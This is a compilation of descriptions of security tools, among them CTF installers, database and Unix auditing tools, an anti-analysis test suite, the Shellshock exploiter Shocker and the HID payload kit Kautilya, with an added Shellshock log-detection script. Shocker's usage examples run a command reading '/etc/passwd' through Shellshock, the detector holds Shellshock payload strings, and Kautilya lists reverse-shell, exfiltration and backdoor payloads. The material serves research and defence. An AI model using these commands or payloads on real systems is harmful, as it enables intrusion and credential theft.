CTF-Tools - Some setup scripts for security research tools

This is a collection of setup scripts to create an install of various security research tools. Of course, this isn't a hard problem, but it's really nice to have them in one place that's easily deployable to new machines and so forth.

Installers for the following tools are included:
| Category | Tool | Description |
|---|---|---|
| binary | afl | State-of-the-art fuzzer. |
| binary | angr | Next-generation binary analysis engine from Shellphish. |
| binary | barf | Binary Analysis and Reverse-engineering Framework. |
| binary | bindead | A static analysis tool for binaries. |
| binary | checksec | Check binary hardening settings. |
| binary | codereason | Semantic Binary Code Analysis Framework. |
| binary | crosstool-ng | Cross-compilers and cross-architecture tools. |
| binary | cross2 | A set of cross-compilation tools from a Japanese book on C. |
| binary | elfkickers | A set of utilities for working with ELF files. |
| binary | elfparser | Quickly determine the capabilities of an ELF binary through static analysis. |
| binary | evilize | Tool to create MD5 colliding binaries. |
| binary | gdb | Up-to-date gdb with python2 bindings. |
| binary | panda | Platform for Architecture-Neutral Dynamic Analysis. |
| binary | pathgrind | Path-based, symbolically-assisted fuzzer. |
| binary | peda | Enhanced environment for gdb. |
| binary | preeny | A collection of helpful preloads (compiled for many architectures!). |
| binary | pwntools | Useful CTF utilities. |
| binary | python-pin | Python bindings for pin. |
| binary | qemu | Latest version of qemu! |
| binary | qira | Parallel, timeless debugger. |
| binary | radare2 | Some crazy thing crowell likes. |
| binary | rp++ | Another gadget finder. |
| binary | shellnoob | Shellcode writing helper. |
| binary | shellsploit | Shellcode development kit. |
| binary | snowman | Cross-architecture decompiler. |
| binary | taintgrind | A valgrind taint analysis tool. |
| binary | villoc | Visualization of heap operations. |
| binary | virtualsocket | A nice library to interact with binaries. |
| binary | xrop | Gadget finder. |
| forensics | binwalk | Firmware (and arbitrary file) analysis tool. |
| forensics | dislocker | Tool for reading Bitlocker encrypted partitions. |
| forensics | exetractor | Unpacker for packed Python executables. Supports PyInstaller and py2exe. |
| forensics | firmware-mod-kit | Tools for firmware packing/unpacking. |
| forensics | pdf-parser | Tool for digging in PDF files. |
| forensics | scrdec | A decoder for encoded Windows Scripts. |
| forensics | testdisk | Testdisk and photorec for file recovery. |
| crypto | cribdrag | Interactive crib dragging tool (for crypto). |
| crypto | foresight | A tool for predicting the output of random number generators. To run, launch "foresee". |
| crypto | hashpump | A tool for performing hash length extension attacks. |
| crypto | hashpump-partialhash | Hashpump, supporting partially-unknown hashes. |
| crypto | hash-identifier | Simple hash algorithm identifier. |
| crypto | littleblackbox | Database of private SSL/SSH keys for embedded devices. |
| crypto | msieve | Msieve is a C library implementing a suite of algorithms to factor large integers. |
| crypto | pemcrack | SSL PEM file cracker. |
| crypto | pkcrack | PkZip encryption cracker. |
| crypto | python-paddingoracle | Padding oracle attack automation. |
| crypto | reveng | CRC finder. |
| crypto | ssh_decoder | A tool for decoding ssh traffic. You will need ruby1.8 from https://launchpad.net/~brightbox/+archive/ubuntu/ruby-ng to run this. Run with ssh_decoder --help for help, as running it with no arguments causes it to crash. |
| crypto | sslsplit | SSL/TLS MITM. |
| crypto | xortool | XOR analysis tool. |
| crypto | yafu | Automated integer factorization. |
| web | burpsuite | Web proxy to do naughty web stuff. |
| web | commix | Command injection and exploitation tool. |
| web | dirs3arch | Web path scanner. |
| web | sqlmap | SQL injection automation engine. |
| web | subbrute | A DNS meta-query spider that enumerates DNS records, and subdomains. |
| stego | sound-visualizer | Audio file visualization. |
| stego | steganabara | Another image steganography solver. |
| stego | stegdetect | Steganography detection/breaking tool. |
| stego | stegsolve | Image steganography solver. |
| android | apktool | Dissect, dis-assemble, and re-pack Android APKs. |
There are also some installers for non-CTF stuff to break the monotony!
| Category | Tool | Description |
|---|---|---|
| game | Dwarf Fortress | Something to help you relax after a CTF! |

Usage
To use, do:
# set up the path
/path/to/ctf-tools/bin/manage-tools setup
source ~/.bashrc

# list the available tools
manage-tools list

# install gdb, allowing it to try to sudo install dependencies
manage-tools -s install gdb

# install pwntools, but don't let it sudo install dependencies
manage-tools install pwntools

# uninstall gdb
manage-tools uninstall gdb

# uninstall all tools
manage-tools uninstall all

# search for a tool
manage-tools search preload
Where possible, the tools keep their installs very self-contained (i.e., in the tool/ directory), and most uninstalls are just calls to git clean (NOTE: this is NOT careful; everything under the tool directory, including whatever you were working on, is blown away during an uninstall). To support Python dependencies, however, make sure to create a virtualenv before installing and using tools (i.e., mkvirtualenv --system-site-packages ctf). The --system-site-packages flag is there for easier reuse of apt-installed Python packages where necessary.

Docker
By popular demand, a Dockerfile has been included. You can build a docker image with:
git clone https://github.com/zardus/ctf-tools
docker build -t ctf-tools .
And run it with:
docker run -it ctf-tools
The built image will have ctf-tools cloned and ready to go, but you will still need to install the tools themselves (see above).

Vagrant
You can build a Vagrant VM with:
wget https://raw.githubusercontent.com/zardus/ctf-tools/master/Vagrantfile
vagrant up
And connect to it via:
vagrant ssh

Adding Tools
To add a tool (say, named toolname ), do the following:
  1. Create a toolname directory.
  2. Create an install script.
  3. (optional) if special uninstall steps are required, create an uninstall script.

Install Scripts
The install script will be run with $PWD being toolname . It should install the tool into this directory, in as contained a manner as possible. Ideally, full uninstallation should be possible with a git clean .
The install script should create a bin directory and put its executables there. These executables will be automatically linked into the main bin directory for the repo. They could be launched from any directory, so don't make assumptions about the location of $0 !



DbDat - Db Database Assessment Tool

DbDat performs numerous checks on a database to evaluate its security. The categories of checks performed are configuration, privileges, users, and information. Checks are performed by running queries or reading database configuration files. The goal of this tool is to highlight issues that need immediate attention and to identify configuration settings that should be reviewed for appropriateness. This tool is not for identifying SQL Injection vulnerabilities in an application; there are good tools available for that already (e.g. https://github.com/sqlmapproject ). Also, this tool does not attempt to determine what CVEs may impact the version of the target database (but may do so in the future, maybe). Rather, this tool can help you better understand the potential impact of a successful SQL Injection attack due to weak configuration or access controls. A majority of the checks are from the CIS ( https://cisecurity.org ) Security Benchmarks for databases, so thanks to the CIS! The benchmark documents can be found here: https://benchmarks.cisecurity.org/downloads/browse/index.cfm?category=benchmarks.servers.database

Finally, DbDat is intended to be a framework that enables easy creation of new plugins and checks. Contributions from the security community, or even the database administrator community, are what will make this a great tool. The current set of checks is in no way complete; certainly more needs to be done. Please contribute!

Developing New Database Checks
Pull requests are very welcome! Checks are organized by database type (e.g. MySQL, Oracle, MS SQL, etc.) in the plugins folder. Each check is a single Python file whose name must begin with check_. Each file contains a class with a do_check method, which holds the primary logic of the check. The quick way to get started is to copy an existing check file and modify it. However, see the Developing Plugins section below for more details.

Running DbDat
  1. Be sure you have the necessary dependencies installed for Python scripts to connect to your target database. See dependencies section below.
  2. Add a connection profile entry in the etc/dbdat.conf file for each database you want to assess.
  3. Run: python dbdat.py -p <profile name>
  4. View the report. To view the report, cd to the reports directory and run python -m SimpleHTTPServer 9000 (or choose a port number you prefer). Then open your browser and navigate to http://localhost:9000 .
To see a list of additional command line arguments run python dbdat.py -h

Report Output
The report organizes results by levels, which are RED, YELLOW, ORANGE, GRAY, and GREEN.
  • RED - items needing immediate attention.
  • YELLOW - items needing review.
  • ORANGE - checks that failed to execute properly.
  • GRAY - items that may not be applicable to the version of the database being assessed.
  • GREEN - items that passed
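As an added example (not DbDat's own code), a miniature version of the check/plugin structure described under Developing New Database Checks (one class per check_*.py file, with a do_check method) that also produces the five report levels above, including ORANGE for a check that fails to execute and GRAY for one that does not apply to the server version. The Result class, the do_check(conn) signature, the check classes and the FakeConnection stand-in for a database connection are assumptions made for this illustration.

```python
# Added example, not DbDat's own code: a miniature version of the check/plugin
# structure (one class per check_*.py file, with a do_check method) and of the
# RED/YELLOW/ORANGE/GRAY/GREEN report levels described above. Result, the
# do_check(conn) signature, the check classes and FakeConnection are assumptions.
from dataclasses import dataclass

RED, YELLOW, ORANGE, GRAY, GREEN = "RED", "YELLOW", "ORANGE", "GRAY", "GREEN"

@dataclass
class Result:
    title: str
    level: str
    detail: str = ""

class FakeConnection:
    """Stand-in for a DB-API connection: answers a fixed set of queries (constructed)."""
    def __init__(self, answers):
        self.answers = answers

    def query(self, sql):
        if sql not in self.answers:
            raise RuntimeError("query not supported by this server: " + sql)
        return self.answers[sql]

def server_version(conn):
    """(major, minor) of a MySQL version string such as '5.5.62-log'."""
    major, minor = conn.query("SELECT VERSION()")[0][0].split(".")[:2]
    return int(major), int(minor)

class check_local_infile:
    """CIS: local_infile should be OFF (LOAD DATA LOCAL reads files on the client)."""
    TITLE = "local_infile is disabled"
    def do_check(self, conn):
        rows = conn.query("SHOW VARIABLES LIKE 'local_infile'")
        if rows and rows[0][1].upper() == "ON":
            return Result(self.TITLE, RED, "local_infile=ON; set local_infile=OFF")
        return Result(self.TITLE, GREEN)

class check_anonymous_accounts:
    """CIS: no accounts with an empty user name."""
    TITLE = "No anonymous accounts"
    def do_check(self, conn):
        rows = conn.query("SELECT user, host FROM mysql.user WHERE user = ''")
        if rows:
            hosts = ", ".join("''@'%s'" % host for _, host in rows)
            return Result(self.TITLE, RED, "anonymous accounts: " + hosts)
        return Result(self.TITLE, GREEN)

class check_test_database:
    """CIS: the default 'test' database should be removed."""
    TITLE = "Default test database removed"
    def do_check(self, conn):
        return Result(self.TITLE, RED if conn.query("SHOW DATABASES LIKE 'test'") else GREEN)

class check_password_validation:
    """validate_password exists only from MySQL 5.6, so older servers get GRAY."""
    TITLE = "Password validation plugin loaded"
    def do_check(self, conn):
        if server_version(conn) < (5, 6):
            return Result(self.TITLE, GRAY, "plugin not available before MySQL 5.6")
        rows = conn.query("SHOW VARIABLES LIKE 'validate_password%'")
        return Result(self.TITLE, GREEN if rows else YELLOW)

class check_error_log:
    """Error logging should be configured; the sample server cannot answer this query."""
    TITLE = "Error log configured"
    def do_check(self, conn):
        rows = conn.query("SHOW VARIABLES LIKE 'log_error'")
        return Result(self.TITLE, GREEN if rows and rows[0][1] else YELLOW)

ALL_CHECKS = [check_local_infile, check_anonymous_accounts, check_test_database,
              check_password_validation, check_error_log]

def run_checks(conn, checks):
    """Run every check; a check that raises is reported as ORANGE instead of being dropped."""
    results = []
    for cls in checks:
        try:
            results.append(cls().do_check(conn))
        except Exception as exc:
            results.append(Result(cls.TITLE, ORANGE, "check failed: %s" % exc))
    return results

def summarize(results):
    """Count findings per level, in the order the report uses."""
    counts = dict.fromkeys((RED, YELLOW, ORANGE, GRAY, GREEN), 0)
    for r in results:
        counts[r.level] += 1
    return counts

# Constructed sample: MySQL 5.5 with local_infile ON, one anonymous account, no test database.
SAMPLE = FakeConnection({
    "SELECT VERSION()": [("5.5.62-log",)],
    "SHOW VARIABLES LIKE 'local_infile'": [("local_infile", "ON")],
    "SELECT user, host FROM mysql.user WHERE user = ''": [("", "localhost")],
    "SHOW DATABASES LIKE 'test'": [],
})

if __name__ == "__main__":
    results = run_checks(SAMPLE, ALL_CHECKS)
    for r in results:
        print("%-7s %s  %s" % (r.level, r.title, r.detail))
    print(summarize(results))
```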

Dependencies
So far DbDat has been tested on Debian Linux, CentOS Linux, and Windows 7 with Python 2.7.

MySQL support
Run: pip install MySQL-python
Or on Debian, run: apt-get install python-mysqldb

PostgreSQL support
Run: pip install psycopg2

Oracle support
Run: pip install cx_Oracle
Note: you will need to install Oracle client libraries for this to work.

MS SQL support
Run: pip install pymssql

Sybase support
  • todo

DB2 support
Run: pip install ibm_db or easy_install ibm_db
Note: you will need to ensure the user running DbDat has access to execute DB2 CLP commands (e.g. db2 and db2level).

MongoDB support
Run: pip install mongodb
To support MongoDB YAML config files run: pip install pyyaml

CouchDB support
Run: pip install couchdb


Lynis 2.2.0 - Security Auditing Tool for Unix/Linux Systems


Lynis is an open source security auditing tool, commonly used by system administrators, security professionals and auditors to evaluate the security defenses of their Linux/Unix based systems. It runs on the host itself, so it can perform very extensive security scans.

Supported operating systems

The tool has almost no dependencies, so it runs on almost all Unix based systems and versions, including:
  • AIX
  • FreeBSD
  • HP-UX
  • Linux
  • Mac OS
  • NetBSD
  • OpenBSD
  • Solaris
  • and others
It even runs on systems like the Raspberry Pi and several storage devices!

No installation required

The tool is very flexible and easy to use. It is one of the few tools in which installation is optional. Just place it on the system, give it a command like "audit system", and it will run. It is written in shell script and released as open source software (GPL).

How it works

Lynis performs hundreds of individual tests to determine the security state of the system. The security scan itself consists of a set of steps, from initializing the program up to the report.

Steps
  1. Determine operating system
  2. Search for available tools and utilities
  3. Check for Lynis update
  4. Run tests from enabled plugins
  5. Run security tests per category
  6. Report status of security scan
During the scan, technical details about the scan are stored in a log file. At the same time findings (warnings, suggestions, data collection), are stored in a report file.

Opportunistic scanning

Lynis scanning is opportunistic: it uses what it can find.
For example, if it sees you are running Apache, it will perform an initial round of Apache-related tests. When during the Apache scan it also discovers an SSL/TLS configuration, it will perform additional auditing steps on that. While doing that, it will then collect discovered certificates, so they can be scanned later as well.

In-depth security scans

By performing opportunistic scanning, the tool can run with almost no dependencies. The more it finds, the deeper the audit will be. In other words, Lynis will always perform scans which are customized to your system. No audit will be the same!

Use cases

Since Lynis is flexible, it is used for several different purposes. Typical use cases for Lynis include:
  • Security auditing
  • Compliance testing (e.g. PCI, HIPAA, SOx)
  • Vulnerability detection and scanning
  • System hardening

Resources used for testing

Many other tools use the same data files for performing tests. Since Lynis is not limited to a few common Linux distributions, it uses tests from standards and many custom ones not found in any other tool.
  • Best practices
  • CIS
  • NIST
  • NSA
  • OpenSCAP data
  • Vendor guides and recommendations (e.g. Debian, Gentoo, Red Hat)

Parameters
--auditor "Given name Surname"   Assign an auditor name to the audit (report)
--checkall, -c                   Start the check
--check-update                   Check if Lynis is up-to-date
--cronjob                        Run Lynis as cronjob (includes -c -Q)
--help, -h                       Shows valid parameters
--manpage                        View man page
--nocolors                       Do not use any colors
--pentest                        Perform a penetration test scan (non-privileged)
--quick, -Q                      Don't wait for user input, except on errors
--quiet                          Only show warnings (includes --quick, but doesn't wait)
--reverse-colors                 Use a different color scheme for lighter backgrounds
--version, -V                    Check program version (and quit)

Changelog
Lynis 2.2.0
= Lynis 2.2.0 (2016-03-18) =

We are proud to present this new release of Lynis. It is a major upgrade, and the
result of many months of work. This version includes new features and tests, and
many small enhancements. We encourage all to test and upgrade to this latest
release.

* Highlights
------------
The biggest change in this release is the optimization of several functions. It
allows for better detection, and dealing with the quirks, of every single
operating system. Some functions were fortified to handle unexpected results
better, like missing a particular binary, or not returning the hostname.

This release also enables tests to be shorter, by adding new functions. Some
functions were renamed or slightly changed, to provide more value to the tooling.
Another big change in this release is a wide set of optimizations and quality
testing. Outdated pieces were removed, or rewritten, to support features seen in
newer distributions.

In the area of compliance, adjustments have been made to start supporting more
in-depth testing for this. Ideal for companies who have a particular compliance
need, or want to test and enforce the system hardening levels of their systems.

Last but not least, many small changes make this software easier to use. On
our website we added new guides to provide help and support.

We would like to thank our contributors, in particular Kamil Boratyński, Steve Bosek,
and Eric Light. Their contributions helped us greatly in shaping this release.


Al-Khaser - Public Malware Techniques Used In The Wild



al-khaser is a PoC malware with good intentions that aims to stress your anti-malware system. It performs a bunch of the tricks used by today's malware, and the goal is to see if you catch them all.

Possible uses
  • You are making an anti-debug plugin and you want to check its effectiveness.
  • You want to ensure that your sandbox solution is hidden enough.
  • Or you want to ensure that your malware analysis environment is well hidden.
If you have seen an anti-analysis trick in a malware sample, please don't hesitate to contribute it.

Features

Anti-debugging attacks
  • IsDebuggerPresent
  • CheckRemoteDebuggerPresent
  • Process Environment Block (BeingDebugged)
  • Process Environment Block (NtGlobalFlag)
  • ProcessHeap (Flags)
  • ProcessHeap (ForceFlags)
  • NtQueryInformationProcess (ProcessDebugPort)
  • NtQueryInformationProcess (ProcessDebugFlags)
  • NtQueryInformationProcess (ProcessDebugObject)
  • NtSetInformationThread (HideThreadFromDebugger)
  • NtQueryObject (ObjectTypeInformation)
  • NtQueryObject (ObjectAllTypesInformation)
  • CloseHandle (NtClose) invalid handle
  • UnhandledExceptionFilter
  • OutputDebugString (GetLastError())
  • Hardware Breakpoints (SEH / GetThreadContext)
  • Software Breakpoints (INT3 / 0xCC)
  • Memory Breakpoints (PAGE_GUARD)
  • Interrupt 0x2d
  • Interrupt 1
  • Parent Process (Explorer.exe)
  • SeDebugPrivilege (Csrss.exe)
  • NtYieldExecution / SwitchToThread

Anti-virtualization
  • Virtualbox registry key values artifacts:
    • HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 0\Target Id 0\Logical Unit Id 0 (Identifier)
    • HARDWARE\Description\System (SystemBiosVersion)
    • HARDWARE\Description\System (VideoBiosVersion)
    • HARDWARE\Description\System (SystemBiosDate)
  • Virtualbox registry Keys artifacts
    • "HARDWARE\ACPI\RSDT\VBOX__"
    • "HARDWARE\ACPI\FADT\VBOX__"
    • "HARDWARE\ACPI\RSDT\VBOX__"
    • "SOFTWARE\Oracle\VirtualBox Guest Additions"
    • "SYSTEM\ControlSet001\Services\VBoxGuest"
    • "SYSTEM\ControlSet001\Services\VBoxMouse"
    • "SYSTEM\ControlSet001\Services\VBoxService"
    • "SYSTEM\ControlSet001\Services\VBoxSF"
    • "SYSTEM\ControlSet001\Services\VBoxVideo"
  • Virtualbox file system artifacts:
    • "system32\drivers\VBoxMouse.sys"
    • "system32\drivers\VBoxGuest.sys"
    • "system32\drivers\VBoxSF.sys"
    • "system32\drivers\VBoxVideo.sys"
    • "system32\vboxdisp.dll"
    • "system32\vboxhook.dll"
    • "system32\vboxmrxnp.dll"
    • "system32\vboxogl.dll"
    • "system32\vboxoglarrayspu.dll"
    • "system32\vboxoglcrutil.dll"
    • "system32\vboxoglerrorspu.dll"
    • "system32\vboxoglfeedbackspu.dll"
    • "system32\vboxoglpackspu.dll"
    • "system32\vboxoglpassthroughspu.dll"
    • "system32\vboxservice.exe"
    • "system32\vboxtray.exe"
    • "system32\VBoxControl.exe"
  • Virtualbox directories artifacts:
    • "oracle\virtualbox guest additions\"
  • Virtualbox MAC Address:
    • "\x08\x00\x27"
  • Virtualbox virtual devices:
    • "\\.\VBoxMiniRdrDN"
    • "\\.\VBoxGuest"
    • "\\.\pipe\VBoxMiniRdDN"
    • "\\.\VBoxTrayIPC"
    • "\\.\pipe\VBoxTrayIPC"
  • Virtualbox Windows Class
    • VBoxTrayToolWndClass
    • VBoxTrayToolWnd
  • Virtualbox network share
    • VirtualBox Shared Folders
  • Virtualbox process list
    • vboxservice.exe
    • vboxtray.exe

Anti Dumping
  • Erase PE header from memory

Code/DLL Injections techniques
  • CreateRemoteThread
  • SetWindowsHooksEx
  • NtCreateThreadEx
  • RtlCreateUserThread
  • APC (QueueUserAPC / NtQueueApcThread)
  • RunPE (GetThreadContext / SetThreadContext)

Timing Attacks
  • Sleep -> SleepEx -> NtDelayExecution
  • SetTimer (Standard Windows Timers)
  • timeSetEvent (Multimedia Timers)


Shocker - A tool to find and exploit servers vulnerable to Shellshock


A tool to find and exploit servers vulnerable to Shellshock

Help Text
usage: shocker.py
-h, --help show this help message and exit
--Host HOST, -H HOST A target hostname or IP address
--file FILE, -f FILE File containing a list of targets
--port PORT, -p PORT The target port number (default=80)
--exploit EXPLOIT, -e EXPLOIT Command to execute (default=/bin/uname -a)
--cgi CGI, -c CGI Single CGI to check (e.g. /cgi-bin/test.cgi)
--proxy PROXY A BIT BROKEN RIGHT NOW Proxy to be used in the form 'ip:port'
--ssl, -s Use SSL (default=False)
--threads THREADS, -t THREADS Maximum number of threads (default=10, max=100)
--verbose, -v Be verbose in output

Usage Examples
./shocker.py -H 127.0.0.1 -e "/bin/cat /etc/passwd" -c /cgi-bin/test.cgi
Scans for http://127.0.0.1/cgi-bin/test.cgi and, if found, attempts to cat /etc/passwd.
./shocker.py -H www.example.com -p 8001 -s
Scans www.example.com on port 8001 using SSL for all scripts in cgi_list and attempts the default exploit against any found.
./shocker.py -f ./hostlist
Scans all hosts listed in the file ./hostlist with the default options.
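As an added defender-side example (not part of Shocker), the same probes seen from the server's side: a parser for Apache combined-format access logs that flags the Shellshock function-definition prefix in the fields a CGI handler would export as environment variables (User-Agent, Referer, request line), and does not trip on an ordinary browser User-Agent. The log lines are constructed; the Hit class and function names are assumptions.

```python
# Added defender-side example, not part of Shocker: scan Apache "combined" access
# log lines for the Shellshock function-definition prefix in the fields a CGI
# handler exports to the environment (User-Agent, Referer, request line).
# The log lines below are constructed; Hit and the function names are assumptions.
import re
from dataclasses import dataclass

# combined format: ip ident user [time] "request" status size "referer" "user-agent"
# quoted fields may contain \" escapes, so each is matched as (?:[^"\\]|\\.)*
_QUOTED = r'(?:[^"\\]|\\.)*'
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    + r'"(?P<request>' + _QUOTED + r')" (?P<status>\d{3}) (?P<size>\S+) '
    + r'"(?P<referer>' + _QUOTED + r')" "(?P<agent>' + _QUOTED + r')"$'
)
# The bug fires when an environment variable starts with a function definition,
# "() {" followed by a body; bash tolerates whitespace between the tokens.
SHELLSHOCK_RE = re.compile(r"\(\s*\)\s*\{")

@dataclass
class Hit:
    ip: str
    path: str
    field: str   # which log field carried the pattern
    value: str
    status: str  # for triage only: a 200 does not prove success, nor a 500 failure

def parse_line(line):
    """Return the log fields as a dict, or None for a line not in combined format."""
    m = LOG_RE.match(line.strip())
    return m.groupdict() if m else None

def find_shellshock(lines):
    """Flag every parsable line whose User-Agent, Referer or request line carries the prefix."""
    hits = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        parts = rec["request"].split()
        path = parts[1] if len(parts) >= 2 else rec["request"]
        for field in ("agent", "referer", "request"):
            if SHELLSHOCK_RE.search(rec[field]):
                hits.append(Hit(rec["ip"], path, field, rec[field], rec["status"]))
                break  # one hit per line is enough for triage
    return hits

# Constructed sample: two probes against CGI paths (one via User-Agent, one via
# Referer), one ordinary browser request whose "(X11; ...)" must not match,
# and one line that is not in combined format at all.
SAMPLE_LOG = [
    '203.0.113.5 - - [10/Oct/2014:13:55:36 +0000] "GET /cgi-bin/test.cgi HTTP/1.1" 200 512 "-" "() { :;}; /bin/uname -a"',
    '198.51.100.7 - - [10/Oct/2014:13:56:01 +0000] "GET /index.html HTTP/1.1" 200 2048 "-" "Mozilla/5.0 (X11; Linux x86_64)"',
    '203.0.113.5 - - [10/Oct/2014:13:57:12 +0000] "GET /cgi-bin/status HTTP/1.1" 500 0 "() { :;}; /bin/uname -a" "curl/7.38.0"',
    'not an access log line',
]

if __name__ == "__main__":
    for h in find_shellshock(SAMPLE_LOG):
        print("%s %s via %s (status %s): %r" % (h.ip, h.path, h.field, h.status, h.value))
```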

Dependencies
Python 2.7+

Change Log
Changes in version 0.72 (December 2014)
  • Minor corrections to logic and typos
Changes in version 0.71 (December 2014)
  • Added timeout to urllib2.urlopen requests using a global 'TIMEOUT'
Changes in version 0.7 (November 2014)
  • Add interactive 'pseudo console' for further exploitation of a chosen vulnerable server
  • Attempted to clean up output buffering issues by wrapping sys.stdout in a class which flushes on every call to write
  • Added a progress indicator for use in time consuming tasks to reassure non-verbose users
Changes in version 0.6 (October 2014)
  • Preventing return codes other than 200 from being considered successes
  • Added ability to specify multiple targets in a file
  • Moved the 'cgi_list' list of scripts to attempt to exploit to a file
  • Fixed some output formatting issues
  • Fixed valid hostname/IP regex to allow single word hostnames
Changes in version 0.5 (October 2014)
  • Added ability to specify a single script to target rather than using cgi_list
  • Introduced a timeout on socket operations for host_check
  • Added some usage examples in the script header
  • Added an epilogue to the help text indicating presence of examples
Changes in version 0.4 (October 2014)
  • Introduced a thread count limit defaulting to 10
  • Removed colour support until I can figure out how to make it work in Windows and *nix equally well
  • Spelling corrections
  • More comprehensive cgi_list
  • Removes success_flag from output
Pre 0.4 (October 2014)
  • No idea

TODO
  • Identify and respond correctly to HTTP/200 response - false positives - Low priority/hassle
  • Implement curses for *nix systems - For the whole application or only the pseudo terminal? - Low priority/prettiness
  • Thread the initial host check now that multiple targets are supported (and could make this bit time consuming)
  • Change verbose to integer value - quiet, normal, verbose, debug?
  • Add option to skip initial host checks for the sake of speed?
  • Add a summary of results before exiting
  • Save results to a file? Format?
  • Eventually the idea is to include multiple possible vectors but currently only one is checked.
  • Add Windows and *nix colour support - Low priority/prettiness
  • Add a timeout in interactive mode for commands which don't return, e.g. /bin/cat /dev/zero
  • Prettify - Low priority/prettiness (obviously)
  • Add support for scanning and exploiting SSH and SMTP? https://isc.sans.edu/diary/Shellshock+via+SMTP/18879
  • Add SOCKS proxy support, potentially using https://github.com/rpicard/socksonsocks/ from Robert Picard
  • Other stuff. Probably.


Jsprime - A JavaScript Static Security Analysis Tool

Today, more and more developers are switching to JavaScript as their first choice of language. The reason is simple: JavaScript is now accepted as a mainstream programming language for applications, be it on the web or on mobile, on the client side or on the server side. JavaScript's flexibility and loose typing let developers create rich applications at an unbelievable speed. Major advancements in the performance of JavaScript interpreters in recent years have almost eliminated the question of scalability and throughput for many organizations. So the point is: JavaScript is now a really important and powerful language, and its usage is growing every day. From client-side code in web applications it grew to the server side through Node.JS, and it is now supported as a proper language for writing applications on major mobile operating system platforms like Windows 8 apps and the upcoming Firefox OS apps.

But the problem is that many developers practice insecure coding, which leads to many client-side attacks, of which DOM XSS is the most infamous. We tried to understand the root cause of this problem and found that there are not enough practically usable tools that solve real-world problems. Hence, as our first attempt towards solving this problem, we want to talk about JSPrime: a JavaScript static analysis tool for the rest of us. It is a very light-weight and very easy to use point-and-click tool! The static analysis tool is based on the very popular Esprima ECMAScript parser by Ariya Hidayat.

I would like to highlight some of the interesting features of the tool below:
  • JS Library Aware Source & Sinks
  • Most dynamic or static analyzers are developed to support native/pure JavaScript, which is actually a problem for most developers since the introduction and wide adoption of JavaScript frameworks/libraries like jQuery, YUI, etc. Since these scanners are designed to support pure JavaScript, they fail to understand the context of the development due to the usage of libraries, and produce many false positives and false negatives. To solve this we have identified the dangerous user input sources and code execution sink functions for jQuery and YUI for the initial release, and we shall talk about how users can easily extend it for other frameworks.
  • Variable & Function Tracing (This feature is a part of our code flow analysis algorithm)
  • Variable & Function Scope Aware analysis (This feature is a part of our code flow analysis algorithm)
  • Known filter function aware
  • OOP & Prototype Compliant
  • Minimum False Positive alerts
  • Supports minified JavaScript
  • Blazing fast performance
  • Point and Click :-) (my personal favorite)

Usage

Web Client
Open "index.html" in your browser.

Server-Side (Node.JS)
  1. In the terminal type "node server.js"
  2. Go to 127.0.0.1:8888 in your browser.


Kautilya - Tool for easy use of Human Interface Devices for offensive security and penetration testing


Kautilya is a toolkit which provides various payloads for a Human Interface Device, which may help in breaking into a computer during penetration tests.

List of Payloads

Windows

Gather
  • Gather Information
  • Hashdump and Exfiltrate
  • Keylog and Exfiltrate
  • Sniffer
  • WLAN keys dump
  • Get Target Credentials
  • Dump LSA Secrets
  • Dump passwords in plain
  • Copy SAM
  • Dump Process Memory
  • Dump Windows Vault Credentials

Execute
  • Download and Execute
  • Connect to Hotspot and Execute code
  • Code Execution using Powershell
  • Code Execution using DNS TXT queries
  • Download and Execute PowerShell Script
  • Execute ShellCode
  • Reverse TCP Shell

Backdoor
  • Sethc and Utilman backdoor
  • Time based payload execution
  • HTTP backdoor
  • DNS TXT Backdoor
  • Wireless Rogue AP
  • Tracking Target Connectivity
  • Gupt Backdoor

Escalate
  • Remove Update
  • Forceful Browsing

Manage
  • Add an admin user
  • Change the default DNS server
  • Edit the hosts file
  • Add a user and Enable RDP
  • Add a user and Enable Telnet
  • Add a user and Enable Powershell Remoting

Drop Files
  • Drop a MS Word File
  • Drop a MS Excel File
  • Drop a CHM (Compiled HTML Help) file
  • Drop a Shortcut (.LNK) file
  • Drop a JAR file

Misc
  • Browse and Accept Java Signed Applet
  • Speak on Target

Linux
  • Download and Execute
  • Reverse Shells using built in tools
  • Code Execution
  • DNS TXT Code Execution
  • Perl reverse shell (MSF)

OSX
  • Download and Execute
  • DNS TXT Code Execution
  • Perl Reverse Shell (MSF)
  • Ruby Reverse Shell (MSF)

Payloads Compatibility
  • The Windows payloads and modules are written mostly in PowerShell (in combination with native commands) and are tested on Windows 7 and Windows 8.
  • The Linux payloads are mostly shell scripts (those installed by default) in combination with commands. These are tested on Ubuntu 11.
  • The OS X payloads are shell scripts (those installed by default) with usage of native commands. Tested on OS X Lion running on VMware.

Usage
Run kautilya.rb and follow the menus. Kautilya asks for your inputs for various options. The generated payload is copied to the output directory of Kautilya.
The generated payload is an Arduino sketch, ready to be used with the Arduino IDE. Burn it to the Human Interface Device of your choice and have fun!

Supported Human Interface Devices
In principle, Kautilya should work with any HID capable of acting as a keyboard. Kautilya has been tested on Teensy++ 2.0 and Teensy 3.0 from pjrc.com. Updates about Kautilya can be found most of the time at my blog http://labofapenetrationtester.com/ and the Google group.

User Group
For any queries, discussions and feedback, post to official google group http://groups.google.com/group/kautilya-users or mail me at nikhil d0t uitrgpv at gmail.com

Bugs and Feature requests
Raise an issue or post to the google group.

Dependencies
Kautilya needs colored, highline and artii (and win32console on Windows) gems. Use
bundle install
to install all the required gems.


Guinevere - Automated Security Assessment Reporting Tool


This tool works with Gauntlet (a private tool) to automate assessment reporting.
Main features include:
  • Generate Assessment Report
  • Export Assessment
  • Generate Retest Report
  • Generate Pentest Checklist

Generate Assessment Report
This option will generate a .docx report based on the vulnerabilities identified during an assessment. The report will contain a bullet list of findings, the vulnerability report write-up, and a table of interesting hosts including host names and ports. Each report write-up automatically calculates the number of affected hosts and updates the report verbiage accordingly.

Export Assessment
An SQL dump of the assessment data from Gauntlet will be exported to a .sql file. This file can later be imported by other analysts.

Generate Retest Report
A .docx retest report will be generated. The tool will evaluate the original assessment findings against the retest findings. The retest findings don't need to be ranked, as only the severity level of a vulnerability found in the original assessment will be used. New vulnerabilities and new hosts found during the retest will also be ignored. The report will contain a list of vulnerabilities along with their status (Remediated, Partially Remediated, or Not Remediated). A table will also be provided that contains hosts that are still vulnerable. A statistics table is also provided to be used with building graphs or charts.

Generate Pentest Checklist - BETA
